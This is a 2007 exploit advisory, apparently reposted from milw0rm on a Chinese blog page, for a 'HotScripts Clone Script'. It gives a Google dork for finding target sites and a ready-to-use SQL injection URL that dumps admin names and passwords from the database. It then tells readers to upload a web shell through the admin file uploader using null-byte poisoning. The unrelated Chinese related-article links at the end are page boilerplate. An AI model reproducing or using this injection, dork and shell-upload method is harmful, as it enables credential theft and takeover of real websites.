--==+================================================================================+==-- --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK (google): "Software Categories" "Featured Resources" "Search" DESCRIPTION: Pull admin info from database, and maybe upload shell. EXPLOITS: [url]www.site.com/software-description.php?id=-1/[/url]**/UNION/**/ALL/**/SELECT/**/concat(admin_name,char(58),pwd)/**/FROM/**/sbwmd_admin/* NOTE/TIP: admin login is at /siteadmin/ p_w_picpath upload /siteadmin/fileupload.php, its vulnerable to PHP Nullbyte posisoning. so upload shell. i know this doesnt look like a HotScripts clone but it is. GREETZ: milw0rm.com, H4CK-Y0u.org --==+================================================================================+==-- --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- # milw0rm.com [2007-11-18]
HotScripts Clone Script SQL Injection Vulnerbility
精选 转载
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
git clone 与 git 安装
git clone 与 git 安装
git 安装程序 自定义 -
Dhcp Script Install
DHCP 脚本自动安装 ,省去了大量时间,非常方便实用
network dhcp defaults -
压抑-痛苦
今天你来了,我好开心,可是你知道嘛? 今天我也痛苦了一天,从未有过的绝望。 &nb
职场 情感 休闲 试试 -
域名被恶意指向
&nbs
域名被恶意指向 -
Linux
&n
Linux